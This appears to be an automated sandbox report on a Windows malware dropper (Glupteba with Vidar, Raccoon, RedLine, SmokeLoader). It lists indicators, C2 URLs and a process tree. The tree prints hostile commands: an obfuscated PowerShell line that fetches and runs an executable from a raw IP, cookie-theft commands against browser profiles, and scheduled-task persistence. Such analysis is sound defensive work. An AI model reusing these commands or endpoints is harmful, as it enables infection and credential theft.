glupteba | f52e34603c58c806081a09fc4ba38eabe1e3f12b7a57a75353ecf593177fa7ef

Analysis

max time kernel
7s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
11-08-2021 10:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8765C39CC6647ADC171220B11942422B.exe
Size

3.3MB
MD5

8765c39cc6647adc171220b11942422b
SHA1

5a45fd626dcf26b1f933e5a18db138fe1df64444
SHA256

f52e34603c58c806081a09fc4ba38eabe1e3f12b7a57a75353ecf593177fa7ef
SHA512

8c5bf35e5d6dc7aab1bff4836ef00e44d7e158d4b8d3f9bcf9ebb39a02b21078c5879f061ac926aa52b9a0f9a83752f322db1d98c1a2908a9ec5eed60919fa65

Malware Config

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Extracted

Family

raccoon

Botnet

39b871ed120e56ecbdc546b8a8a78c4e5516bc1f

Attributes

url4cnc
https://telete.in/uiopoppiscess

rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5976-463-0x0000000003FC0000-0x00000000048E6000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5584	3620	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	3620	rundll32.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5908-408-0x0000000002F40000-0x0000000002FD3000-memory.dmp	family_raccoon
behavioral2/memory/5908-438-0x0000000000400000-0x0000000002CB5000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4628-246-0x0000000003030000-0x0000000003060000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata

Nirsoft 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\11111.exe	Nirsoft
behavioral2/memory/4256-298-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3884-183-0x00000000048D0000-0x000000000496D000-memory.dmp	family_vidar
behavioral2/memory/3884-201-0x0000000000400000-0x0000000002CC2000-memory.dmp	family_vidar
behavioral2/memory/5360-404-0x00000000035A0000-0x000000000363D000-memory.dmp	family_vidar
behavioral2/memory/5360-435-0x0000000000400000-0x000000000334A000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS09FA3F14\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 19 IoCs

Processes:

setup_install.exezaiqa_2.exezaiqa_4.exezaiqa_3.exezaiqa_1.exezaiqa_6.exezaiqa_7.exezaiqa_5.exezaiqa_9.exezaiqa_8.exezaiqa_1.exechrome2.exesetup.exe7241299.exe7660010.exe1640198.exe7799788.exewinnetdriv.exeLzmwAqmV.exe

pid	process
2084	setup_install.exe
3676	zaiqa_2.exe
1248	zaiqa_4.exe
3884	zaiqa_3.exe
1504	zaiqa_1.exe
2520	zaiqa_6.exe
2032	zaiqa_7.exe
4012	zaiqa_5.exe
2076	zaiqa_9.exe
3700	zaiqa_8.exe
4388	zaiqa_1.exe
4436	chrome2.exe
4508	setup.exe
4536	7241299.exe
4588	7660010.exe
4628	1640198.exe
4744	7799788.exe
4784	winnetdriv.exe
4920	LzmwAqmV.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

zaiqa_7.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation zaiqa_7.exe
Loads dropped DLL 5 IoCs

Processes:

setup_install.exe

pid process

2084 setup_install.exe
2084 setup_install.exe
2084 setup_install.exe
2084 setup_install.exe
2084 setup_install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	zaiqa_7.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

7660010.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	7660010.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ipinfo.io
11 ipinfo.io
37 ip-api.com
203 ipinfo.io
208 ipinfo.io
Drops file in Windows directory 2 IoCs

Processes:

setup.exe

description ioc process

File created C:\Windows\winnetdriv.exe setup.exe
File opened for modification C:\Windows\winnetdriv.exe setup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
10	ipinfo.io
11	ipinfo.io
37	ip-api.com
203	ipinfo.io
208	ipinfo.io

description	ioc	process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4404	4700	WerFault.exe	dcc7975c8a99514da06323f0994cd79b.exe
6136	1132	WerFault.exe	Fb4cx1UBi3yzE81EEa4Y0dn6.exe
1704	3968	WerFault.exe	setup.exe
1108	1132	WerFault.exe	Fb4cx1UBi3yzE81EEa4Y0dn6.exe
5776	1132	WerFault.exe	Fb4cx1UBi3yzE81EEa4Y0dn6.exe
5956	3968	WerFault.exe	setup.exe
5216	4012	WerFault.exe	zaiqa_5.exe
3856	2076	WerFault.exe	zaiqa_9.exe
4324	3968	WerFault.exe	setup.exe
5460	5492	WerFault.exe	zSYjFxE4usRRAdNcskj_0SBK.exe
5296	5492	WerFault.exe	zSYjFxE4usRRAdNcskj_0SBK.exe
5316	1132	WerFault.exe	Fb4cx1UBi3yzE81EEa4Y0dn6.exe
4360	4536	WerFault.exe	7241299.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

zaiqa_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zaiqa_2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6264 schtasks.exe
5760 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5244 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4348 taskkill.exe
4964 taskkill.exe
6932 taskkill.exe

pid	process
6264	schtasks.exe
5760	schtasks.exe

pid	process
5244	timeout.exe

pid	process
4348	taskkill.exe
4964	taskkill.exe
6932	taskkill.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	212	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

zaiqa_2.exezaiqa_7.exe

pid	process
3676	zaiqa_2.exe
3676	zaiqa_2.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe
2032	zaiqa_7.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

zaiqa_8.exezaiqa_6.exe7241299.exe7799788.exe

description	pid	process
Token: SeDebugPrivilege	3700	zaiqa_8.exe
Token: SeDebugPrivilege	2520	zaiqa_6.exe
Token: SeDebugPrivilege	4536	7241299.exe
Token: SeDebugPrivilege	4744	7799788.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8765C39CC6647ADC171220B11942422B.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exezaiqa_1.exezaiqa_4.exezaiqa_6.exe

description	pid	process	target process
PID 3984 wrote to memory of 2084	3984	8765C39CC6647ADC171220B11942422B.exe	setup_install.exe
PID 3984 wrote to memory of 2084	3984	8765C39CC6647ADC171220B11942422B.exe	setup_install.exe
PID 3984 wrote to memory of 2084	3984	8765C39CC6647ADC171220B11942422B.exe	setup_install.exe
PID 2084 wrote to memory of 2644	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2644	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2644	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2672	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2672	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2672	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 3120	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 3120	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 3120	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1524	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1524	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1524	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1228	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1228	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 1228	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2116	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2116	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2116	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4004	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4004	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4004	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4088	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4088	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 4088	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2740	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2740	2084	setup_install.exe	cmd.exe
PID 2084 wrote to memory of 2740	2084	setup_install.exe	cmd.exe
PID 2672 wrote to memory of 3676	2672	cmd.exe	zaiqa_2.exe
PID 2672 wrote to memory of 3676	2672	cmd.exe	zaiqa_2.exe
PID 2672 wrote to memory of 3676	2672	cmd.exe	zaiqa_2.exe
PID 1524 wrote to memory of 1248	1524	cmd.exe	zaiqa_4.exe
PID 1524 wrote to memory of 1248	1524	cmd.exe	zaiqa_4.exe
PID 1524 wrote to memory of 1248	1524	cmd.exe	zaiqa_4.exe
PID 2644 wrote to memory of 1504	2644	cmd.exe	zaiqa_1.exe
PID 2644 wrote to memory of 1504	2644	cmd.exe	zaiqa_1.exe
PID 2644 wrote to memory of 1504	2644	cmd.exe	zaiqa_1.exe
PID 3120 wrote to memory of 3884	3120	cmd.exe	zaiqa_3.exe
PID 3120 wrote to memory of 3884	3120	cmd.exe	zaiqa_3.exe
PID 3120 wrote to memory of 3884	3120	cmd.exe	zaiqa_3.exe
PID 2116 wrote to memory of 2520	2116	cmd.exe	zaiqa_6.exe
PID 2116 wrote to memory of 2520	2116	cmd.exe	zaiqa_6.exe
PID 1228 wrote to memory of 4012	1228	cmd.exe	zaiqa_5.exe
PID 1228 wrote to memory of 4012	1228	cmd.exe	zaiqa_5.exe
PID 4004 wrote to memory of 2032	4004	cmd.exe	zaiqa_7.exe
PID 4004 wrote to memory of 2032	4004	cmd.exe	zaiqa_7.exe
PID 4004 wrote to memory of 2032	4004	cmd.exe	zaiqa_7.exe
PID 2740 wrote to memory of 2076	2740	cmd.exe	zaiqa_9.exe
PID 2740 wrote to memory of 2076	2740	cmd.exe	zaiqa_9.exe
PID 4088 wrote to memory of 3700	4088	cmd.exe	zaiqa_8.exe
PID 4088 wrote to memory of 3700	4088	cmd.exe	zaiqa_8.exe
PID 1504 wrote to memory of 4388	1504	zaiqa_1.exe	zaiqa_1.exe
PID 1504 wrote to memory of 4388	1504	zaiqa_1.exe	zaiqa_1.exe
PID 1504 wrote to memory of 4388	1504	zaiqa_1.exe	zaiqa_1.exe
PID 1248 wrote to memory of 4436	1248	zaiqa_4.exe	chrome2.exe
PID 1248 wrote to memory of 4436	1248	zaiqa_4.exe	chrome2.exe
PID 1248 wrote to memory of 4508	1248	zaiqa_4.exe	setup.exe
PID 1248 wrote to memory of 4508	1248	zaiqa_4.exe	setup.exe
PID 1248 wrote to memory of 4508	1248	zaiqa_4.exe	setup.exe
PID 2520 wrote to memory of 4536	2520	zaiqa_6.exe	7241299.exe
PID 2520 wrote to memory of 4536	2520	zaiqa_6.exe	7241299.exe
PID 2520 wrote to memory of 4588	2520	zaiqa_6.exe	7660010.exe

C:\Users\Admin\AppData\Local\Temp\8765C39CC6647ADC171220B11942422B.exe
"C:\Users\Admin\AppData\Local\Temp\8765C39CC6647ADC171220B11942422B.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3984
- C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_1.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.exe
      zaiqa_1.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_1.exe" -a
        5⤵
        Executes dropped EXE
        
        PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_3.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_3.exe
      zaiqa_3.exe
      4⤵
      Executes dropped EXE
      PID:3884
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im zaiqa_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_3.exe" & del C:\ProgramData\*.dll & exit
        5⤵
        
        PID:4000
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im zaiqa_3.exe /f
        6⤵
        Kills process with taskkill
        
        PID:4964
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:5244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_5.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_5.exe
      zaiqa_5.exe
      4⤵
      Executes dropped EXE
      PID:4012
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:896
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5188
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5876
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2608
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4012 -s 1548
        5⤵
        Program crash
        
        PID:5216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_4.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_4.exe
      zaiqa_4.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1248
    - - C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        5⤵
        Executes dropped EXE
        
        PID:4436
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        6⤵
        
        PID:5060
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:6264
      - C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        6⤵
        
        PID:7144
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4508
      - C:\Windows\winnetdriv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1628678862 0
        6⤵
        Executes dropped EXE
        
        PID:4784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_6.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_6.exe
      zaiqa_6.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2520
    - - C:\Users\Admin\AppData\Roaming\7241299.exe
        
        "C:\Users\Admin\AppData\Roaming\7241299.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4536 -s 2024
        6⤵
        Program crash
        
        PID:4360
    - - C:\Users\Admin\AppData\Roaming\7660010.exe
        
        "C:\Users\Admin\AppData\Roaming\7660010.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4588
      - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        6⤵
        
        PID:492
    - - C:\Users\Admin\AppData\Roaming\1640198.exe
        
        "C:\Users\Admin\AppData\Roaming\1640198.exe"
        5⤵
        Executes dropped EXE
        
        PID:4628
    - - C:\Users\Admin\AppData\Roaming\7799788.exe
        
        "C:\Users\Admin\AppData\Roaming\7799788.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_7.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Users\Admin\AppData\Local\Temp\7zS09FA3F14\zaiqa_7.exe
      zaiqa_7.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious behavior: EnumeratesProcesses
      PID:2032
    - - C:\Users\Admin\Documents\gMlGCBW3PkdvA2EpIuCyCLyR.exe
        
        "C:\Users\Admin\Documents\gMlGCBW3PkdvA2EpIuCyCLyR.exe"
        5⤵
        
        PID:4596
      - C:\Users\Admin\Documents\gMlGCBW3PkdvA2EpIuCyCLyR.exe
        
        C:\Users\Admin\Documents\gMlGCBW3PkdvA2EpIuCyCLyR.exe
        6⤵
        
        PID:4776
    - - C:\Users\Admin\Documents\Fb4cx1UBi3yzE81EEa4Y0dn6.exe
        
        "C:\Users\Admin\Documents\Fb4cx1UBi3yzE81EEa4Y0dn6.exe"
        5⤵
        
        PID:1132
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 856
        6⤵
        Program crash
        
        PID:6136
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 868
        6⤵
        Program crash
        
        PID:1108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 856
        6⤵
        Program crash
        
        PID:5776
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 876
        6⤵
        Program crash
        
        PID:5316
      - C:\ProgramData\Runtimebroker.exe
        
        "C:\ProgramData\Runtimebroker.exe"
        6⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        7⤵
        
        PID:4460
    - - C:\Users\Admin\Documents\VllDrBW98Lm3ugDTin3YjdGo.exe
        
        "C:\Users\Admin\Documents\VllDrBW98Lm3ugDTin3YjdGo.exe"
        5⤵
        
        PID:5128
      - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        6⤵
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6748
      - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        6⤵
        
        PID:4324
      - C:\Program Files (x86)\Company\NewProduct\customer3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
        6⤵
        
        PID:2388
    - - C:\Users\Admin\Documents\tfQ2GwKK6allG8nmbOaaGyju.exe
        
        "C:\Users\Admin\Documents\tfQ2GwKK6allG8nmbOaaGyju.exe"
        5⤵
        
        PID:5220
    - - C:\Users\Admin\Documents\klwTIHXgvlhqkhBGdCGllzeu.exe
        
        "C:\Users\Admin\Documents\klwTIHXgvlhqkhBGdCGllzeu.exe"
        5⤵
        
        PID:5140
      - C:\Users\Admin\AppData\Roaming\6304695.exe
        
        "C:\Users\Admin\AppData\Roaming\6304695.exe"
        6⤵
        
        PID:6468
      - C:\Users\Admin\AppData\Roaming\7902167.exe
        
        "C:\Users\Admin\AppData\Roaming\7902167.exe"
        6⤵
        
        PID:5192
    - - C:\Users\Admin\Documents\D2hLYLNdL2ZQd3IugX7YCnPG.exe
        
        "C:\Users\Admin\Documents\D2hLYLNdL2ZQd3IugX7YCnPG.exe"
        5⤵
        
        PID:5244
      - C:\Users\Admin\AppData\Roaming\4324507.exe
        
        "C:\Users\Admin\AppData\Roaming\4324507.exe"
        6⤵
        
        PID:7016
      - C:\Users\Admin\AppData\Roaming\2658618.exe
        
        "C:\Users\Admin\AppData\Roaming\2658618.exe"
        6⤵
        
        PID:7044
    - - C:\Users\Admin\Documents\kvma7DV1M7nyhvLx440DOlYw.exe
        
        "C:\Users\Admin\Documents\kvma7DV1M7nyhvLx440DOlYw.exe"
        5⤵
        
        PID:5352
